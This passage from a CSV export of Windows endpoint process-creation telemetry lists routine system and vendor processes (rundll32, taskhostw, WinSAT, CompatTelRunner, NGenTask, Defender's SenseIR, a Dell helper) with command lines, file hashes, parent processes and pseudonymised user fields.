11:17:36.425662+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,13120,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,387772584,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dwm.exe,dwm.exe,Desktop Window Manager
+1521,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-22 11:17:37.512730500+00:00,1120,rundll32.exe,"rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:37.519848+00:00,2021-06-23 00:51:09.678969400+00:00,764d07df-ff8d-4ea9-8976-acd1bbb25cb4,computerpii_0a470890c60768167990033d701e7bd881398861,154088,False,10.7740.19041.1052,False,11540474045136908,,11540474045171725,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,352802188,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+1522,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-22 11:17:38.649387500+00:00,5288,taskhostw.exe,"taskhostw.exe ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe"" /frequentupdate SCHEDULEDTASK displaylevel=False",PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:38.796413+00:00,2021-06-23 00:51:09.680797400+00:00,1d8a3fc2-33cf-438c-a70c-edfd6fcdf67e,computerpii_0a470890c60768167990033d701e7bd881398861,154124,False,10.7740.19041.1052,False,11540474045136925,,11540474045171732,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+1523,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-22 11:17:38.808914800+00:00,18840,DPM.exe,"""DPM.exe"" -LaunchAsHelper -LogFileName=DPM-Helper -SystemContext",PortableExecutable,2021-05-18 18:40:12+00:00,C:\Program Files\Dell\Dell Peripheral Manager\DPM.exe,15820280,9f5e0af77515966211006ba1faf992cf,71a938dcd7832b8a7b6cd67554f83a90b81bdcef98e1362af86a2344b412a642,af168dfd85d18d03083464e5d6112c00d2bacdea,97afe1b8859c5e7862a7ca6c971c74df,fa5314e93650999193c4eee122b6482f921d2d30db88f16ce39032f03b733af4,d7c795b55dbf276f91a9f28df6cc8562b467535b,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-15 01:05:19.778381100+00:00,11792,DPMService.exe,"""DPMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-22 11:17:38.845085500+00:00,2021-06-23 00:51:09.681407900+00:00,a470ae82-f8a7-4e5e-948b-3f5b8365ac16,computerpii_0a470890c60768167990033d701e7bd881398861,154135,False,10.7740.19041.1052,False,11540474045147970,,11540474045171733,2021-06-15 01:05:19.778381100+00:00,11792,2021-06-15 01:05:19.778381100+00:00,DPMService.exe,11792,256,ActiveProcessStartkey,C:\Program Files\Dell\Dell Peripheral Manager,1688056,2021-05-18 18:32:07+00:00,2021-05-18 18:40:14+00:00,2021-06-15 01:05:12.297854100+00:00,2021-05-18 18:40:14+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Dell Inc.,Dell Peripheral Manager,1.4.0,DPMService.exe,DPMService.exe,Dell Peripheral Manager Service,Dell Inc.,Dell Peripheral Manager,1.4.0,DPM.exe,DPM.exe,Dell Peripheral Manager Application
+1524,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:46:47.917828900+00:00,15880,SenseIR.exe,"""SenseIR.exe"" ""OnlineSenseIR"" ""4804"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:46:47.981195700+00:00,2021-06-25 00:47:39.584226+00:00,2c28ef8f-2525-430a-9522-758660af1585,computerpii_0a470890c60768167990033d701e7bd881398861,181713,False,10.7740.19041.1052,False,11540474045137006,,11540474045178390,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+1525,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:14.913979400+00:00,17676,rundll32.exe,"rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:15.927620500+00:00,2021-06-25 00:47:39.584473+00:00,6e1790d7-9219-43a1-bd86-48e95d9989aa,computerpii_0a470890c60768167990033d701e7bd881398861,181719,False,10.7740.19041.1052,False,11540474045136925,,11540474045178397,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+1526,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:14.933191700+00:00,2592,WinSAT.exe,"""winsat.exe"" disk -wsswap",PortableExecutable,2020-10-09 20:48:00.983896300+00:00,C:\Windows\System32\WinSAT.exe,2809856,715db53a8064c6deccf68b7501df3386,cc31fdcdce05144ef750b01233d57614cda7364a73ca26ff68886ebdc650e367,99acd12c3600ad3a7c478e49126db520bc136304,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:14.913979400+00:00,17676,rundll32.exe,"rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:15.932305800+00:00,2021-06-25 00:47:39.584522200+00:00,04eb488d-9487-4fae-ac0e-8435d3ab7900,computerpii_0a470890c60768167990033d701e7bd881398861,181720,False,10.7740.19041.1052,False,11540474045178397,,11540474045178398,2021-06-25 00:47:14.913979400+00:00,17676,2021-06-25 00:47:14.913979400+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,17676,18560,TerminateProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-25 00:43:06.585720800+00:00,2021-02-17 04:35:14.391957+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.207,WinSAT,WinSAT.exe,Windows System Assessment Tool
+1527,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:14.938040500+00:00,14920,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,715db53a8064c6deccf68b7501df3386,cc31fdcdce05144ef750b01233d57614cda7364a73ca26ff68886ebdc650e367,99acd12c3600ad3a7c478e49126db520bc136304,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:14.933191700+00:00,2592,WinSAT.exe,"""winsat.exe"" disk -wsswap",True,2021-06-25 00:47:14.913979400+00:00,17676,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:15.932500200+00:00,2021-06-25 00:47:39.584571200+00:00,a84ae829-2411-4373-80f7-e104cbbe2fd2,computerpii_0a470890c60768167990033d701e7bd881398861,181721,False,10.7740.19041.1052,False,11540474045178398,,11540474045178399,2021-06-25 00:47:14.933191700+00:00,2592,2021-06-25 00:47:14.933191700+00:00,\Device\HarddiskVolume3\Windows\System32\WinSAT.exe,2592,18560,TerminateProcessStartkey,C:\Windows\System32,2809856,2047-11-12 03:38:03+00:00,2020-10-09 20:48:01.015113800+00:00,2021-06-25 00:47:14.948991800+00:00,2020-10-09 20:48:00.983896300+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.207,WinSAT,WinSAT.exe,Windows System Assessment Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1528,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:47:16.550948900+00:00,12616,rundll32.exe,"rundll32.exe Startupscan.dll,SusRunTask",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:16.576816100+00:00,2021-06-25 00:47:39.584765600+00:00,e214cd02-c146-4ea3-b8f1-a72e9f74d569,computerpii_0a470890c60768167990033d701e7bd881398861,181725,False,10.7740.19041.1052,False,11540474045136925,,11540474045178403,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412828,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+1529,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:16.583339800+00:00,13900,lpremove.exe,lpremove.exe,PortableExecutable,2020-10-09 20:47:29.496173+00:00,C:\Windows\System32\lpremove.exe,72704,272b5ea7309039a904d254edcc9796ab,6220ba55d96ddafb6b573b2405db412f7420c77d09b5c1a1637d558ea5480057,5296cb00cbf63fc0443d9bfdc1fe203d596cc497,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:16.601248500+00:00,2021-06-25 00:47:39.584961500+00:00,701cb80c-a22d-4e83-968a-9446384c3ac7,computerpii_0a470890c60768167990033d701e7bd881398861,181728,False,10.7740.19041.1052,False,11540474045136925,,11540474045178408,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.153,lpremove.exe,lpremove.exe,MUI Language pack cleanup
+1530,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:16.596255900+00:00,17792,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,272b5ea7309039a904d254edcc9796ab,6220ba55d96ddafb6b573b2405db412f7420c77d09b5c1a1637d558ea5480057,5296cb00cbf63fc0443d9bfdc1fe203d596cc497,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.583339800+00:00,13900,lpremove.exe,lpremove.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:16.630169400+00:00,2021-06-25 00:47:39.585067+00:00,62fdfeac-d537-41ee-88d1-08cb5da11346,computerpii_0a470890c60768167990033d701e7bd881398861,181730,False,10.7740.19041.1052,False,11540474045178408,,11540474045178410,2021-06-25 00:47:16.583339800+00:00,13900,2021-06-25 00:47:16.583339800+00:00,\Device\HarddiskVolume3\Windows\System32\lpremove.exe,13900,128,ActiveProcessStartkey,C:\Windows\System32,72704,2074-03-09 00:21:16+00:00,2020-10-09 20:47:29.496173+00:00,2021-06-25 00:47:16.580548+00:00,2020-10-09 20:47:29.496173+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.153,lpremove.exe,lpremove.exe,MUI Language pack cleanup,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1531,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:16.763022100+00:00,18664,CompatTelRunner.exe,CompatTelRunner.exe -m:pcasvc.dll -f:QueryEncapsulationSettings -cv:2ffD9TS8EEGxTCTh.5,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.591016500+00:00,21124,CompatTelRunner.exe,compattelrunner.exe -maintenance,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:16.799158900+00:00,2021-06-25 00:47:39.585884900+00:00,0b622ce0-c2d0-48e0-abb0-4a3b46a3457d,computerpii_0a470890c60768167990033d701e7bd881398861,181744,False,10.7740.19041.1052,False,11540474045178409,,11540474045178424,2021-06-25 00:47:16.591016500+00:00,21124,2021-06-25 00:47:16.591016500+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,21124,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-25 00:47:16.580548+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+1532,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:16.778074900+00:00,18012,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:580",PortableExecutable,2021-02-17 04:29:20.504956500+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,79312,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.557310900+00:00,6108,taskhostw.exe,taskhostw.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:16.800888600+00:00,2021-06-25 00:47:39.585934200+00:00,af30d095-d570-47f6-a0a8-3ea7bef28677,computerpii_0a470890c60768167990033d701e7bd881398861,181745,False,10.7740.19041.1052,False,11540474045178405,,11540474045178425,2021-06-25 00:47:16.557310900+00:00,6108,2021-06-25 00:47:16.557310900+00:00,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,6108,128,ActiveProcessStartkey,C:\Windows\System32,97096,2081-06-21 11:10:49+00:00,2021-04-14 01:10:22.933876900+00:00,2021-06-10 00:46:19.536396300+00:00,2021-04-14 01:10:22.932389100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
+1533,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:16.790866400+00:00,5032,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:596",PortableExecutable,2021-02-17 04:29:20.532877500+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,79816,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.557310900+00:00,6108,taskhostw.exe,taskhostw.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:16.855555200+00:00,2021-06-25 00:47:39.585982500+00:00,6f7122e1-f12c-44eb-bffc-1c658caafbe4,computerpii_0a470890c60768167990033d701e7bd881398861,181746,False,10.7740.19041.1052,False,11540474045178405,,11540474045178426,2021-06-25 00:47:16.557310900+00:00,6108,2021-06-25 00:47:16.557310900+00:00,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,6108,128,ActiveProcessStartkey,C:\Windows\System32,97096,2081-06-21 11:10:49+00:00,2021-04-14 01:10:22.933876900+00:00,2021-06-10 00:46:19.536396300+00:00,2021-04-14 01:10:22.932389100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service
